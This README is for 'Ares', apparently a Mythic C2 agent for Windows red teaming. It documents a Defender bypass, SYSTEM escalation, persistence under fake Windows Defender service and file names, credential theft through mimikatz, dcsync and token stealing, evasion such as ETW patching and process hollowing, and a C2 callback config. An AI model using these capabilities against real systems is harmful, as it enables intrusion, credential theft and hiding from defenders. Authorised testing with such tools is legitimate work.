Ares-mythic/README.md

Ares - Advanced Windows Agent

Ares is a sophisticated Windows agent designed for advanced red team operations, integrating BlueHammer exploit capabilities with Mythic C2 framework for comprehensive penetration testing and security assessment.

🚀 Overview

Ares combines the power of the BlueHammer Windows Defender exploit with a robust Mythic C2 integration, providing:

• Windows Defender bypass capabilities
• SYSTEM privilege escalation
• Multiple persistence mechanisms
• Full Mythic C2 integration
• Advanced evasion techniques

📋 Features

Core Capabilities

• Windows Defender Bypass: Leverages BlueHammer exploit to disable security controls
• SYSTEM Privileges: Multiple techniques for privilege escalation to NT AUTHORITY\SYSTEM
• Persistence: Comprehensive persistence across registry, services, tasks, and startup
• Mythic C2 Integration: Full command and control capabilities
• Encrypted Communication: AES256 encryption with HMAC integrity

Advanced Features

• P2P Communication: Peer-to-peer agent communication
• Credential Operations: Credential tracking and manipulation
• Code Execution: Unmanaged PE, .NET Assembly, and PowerShell execution
• SOCKSv5 Support: Proxy capabilities for network operations
• Domain Rotation: Advanced HTTP profile with proxy support
• Message Transform: Base64, NetBIOS, XOR encoding support

🛠️ Installation

Prerequisites

• Mythic C2 server installed on a remote computer
• Windows target systems for deployment
• Python 3.8+ for agent building

Installation from Mythic

As root user:

./mythic-cli install github https://github.com/MythicAgents/Ares.git

As non-root user:

sudo -E ./mythic-cli install github https://github.com/MythicAgents/Ares.git

Once installed, restart Mythic to build the agent.

Manual Building

1. Clone the repository:

git clone https://github.com/MythicAgents/Ares.git
cd Ares

2. Build the agent:

python build.py

3. Deploy the agent:

python deploy.py

⚙️ Configuration

C2 Profile Configuration

Ares supports advanced HTTP profile configuration:

{
    "c2_profile": "http",
    "callback_host": "http://your-c2-server.com",
    "callback_port": 80,
    "callback_interval": 10,
    "callback_jitter": 23,
    "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
    },
    "AESPSK": {
        "enc_key": "your-encryption-key",
        "dec_key": "your-decryption-key",
        "value": "aes256_hmac"
    }
}

Build Parameters

{
    "output_type": "WinExe",
    "filename": "win-update.exe",
    "debug": true,
    "shellcode_bypass": "Continue on fail",
    "enable_keying": false
}

🎯 Usage

Agent Execution

Execute the agent on target systems:

win-update.exe

Command Examples

Windows Defender Bypass

bypass_defender

Privilege Escalation

getsystem

Persistence Establishment

establish_persistence

File Operations

# Download file
download -Path C:\sensitive\file.txt

# Upload file  
upload -File local_file.txt -RemotePath C:\temp\file.txt

Code Execution

# Execute .NET assembly
execute_assembly -Assembly malware.exe -Arguments "-flag value"

# Execute PowerShell
powershell -Command "Get-Process"

# Execute COFF object file
execute_coff -Coff object.x64.o -Function go

🔧 Commands Reference

Core Commands

Command	Syntax	Description
bypass_defender	bypass_defender	Bypass Windows Defender using BlueHammer exploit
getsystem	getsystem	Gain SYSTEM privileges using multiple techniques
establish_persistence	establish_persistence	Establish multiple persistence mechanisms
assembly_inject	assembly_inject -PID [pid] -Assembly [assembly]	Execute .NET assembly in remote process
execute_assembly	execute_assembly -Assembly [assembly.exe]	Execute registered .NET assembly
execute_pe	execute_pe -PE [binary.exe]	Execute statically compiled executable

File Operations

Command	Syntax	Description
download	download -Path [path]	Download file from target system
upload	upload -File [file] -RemotePath [path]	Upload file to target system
cat	cat -Path [file]	Display file contents
cp	cp -Path [source] -Destination [dest]	Copy file
mv	mv -Path [source] -Destination [dest]	Move file
rm	rm -Path [file]	Remove file

System Operations

Command	Syntax	Description
shell	shell -Command "command"	Execute shell command
ps	ps	List processes
kill	kill -PID [pid]	Kill process
ls	ls -Path [dir]	List directory contents
cd	cd -Path [dir]	Change directory
pwd	pwd	Print working directory

Network Operations

Command	Syntax	Description
ifconfig	ifconfig	Get network adapters
netstat	netstat	Display network connections
net_dclist	net_dclist	List domain controllers
net_shares	net_shares	List network shares

Credential Operations

Command	Syntax	Description
mimikatz	mimikatz -Command "command"	Execute Mimikatz commands
dcsync	dcsync -Domain [domain]	DCSync domain credentials
make_token	make_token -Domain [domain] -User [user] -Password [pass]	Create access token
steal_token	steal_token -PID [pid]	Steal token from process

🛡️ Persistence Mechanisms

Registry Persistence

• HKCU: Software\Microsoft\Windows\CurrentVersion\Run
• HKLM: Software\Microsoft\Windows\CurrentVersion\Run

Service Persistence

• Service Name: WinDefendUpdate
• Run As: LocalSystem
• Startup Type: Automatic

Scheduled Tasks

• Task Name: WindowsDefenderMaintenance
• Schedule: Hourly
• Run As: SYSTEM

Startup Folder

• Location: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
• File Name: WindowsDefenderUpdate.exe

🔒 Security Features

Encryption

• AES256-CBC: End-to-end encryption
• HMAC-SHA256: Message integrity verification
• Key Rotation: Configurable key rotation policies

Evasion Techniques

• Process Hollowing: Advanced code injection
• API Unhooking: Bypass security hooks
• Direct Syscalls: Bypass user-mode hooks
• Stack Spoofing: Evade stack-based detection

📊 Mythic Integration

C2 Communication

• Check-in Interval: Configurable (default: 10 seconds)
• Jitter: Percentage-based jitter (default: 23%)
• Encryption: AES256 with HMAC integrity
• Proxy Support: HTTP proxies and domain fronting

Task Processing

• Asynchronous Processing: Non-blocking task execution
• Result Reporting: Comprehensive result reporting
• Error Handling: Robust error handling and recovery
• Status Updates: Real-time task status updates

🚨 Detection Evasion

Ares employs multiple techniques to evade detection:

Behavioral Evasion

• Legitimate process names
• Windows Defender-related service names
• Temp directory operation
• Fileless execution where possible

Technical Evasion

• API unhooking
• Direct system calls
• Stack spoofing
• Process hollowing
• ETW patching

⚠️ Disclaimer

This tool is intended for:

• Authorized penetration testing
• Security research and education
• Red team operations with proper authorization

Unauthorized use against systems you do not own or have explicit permission to test is illegal.

🐛 Issues and Support

Report issues and feature requests:

• GitHub Issues: https://github.com/MythicAgents/Ares/issues
• Documentation: https://github.com/MythicAgents/Ares/wiki
• Community Support: Mythic Discord server

📄 License

This project is licensed under the MIT License. See the LICENSE file for details.

🙏 Credits

• BlueHammer Researchers: For the Windows Defender exploit
• Mythic C2 Team: For the excellent C2 framework
• Security Researchers: For ongoing research and techniques
• Red Team Community: For testing and feedback

🔗 Resources

• Mythic C2 Documentation
• BlueHammer Research
• Windows Security Research

---

Ares Team | Advanced Red Team Operations | 2026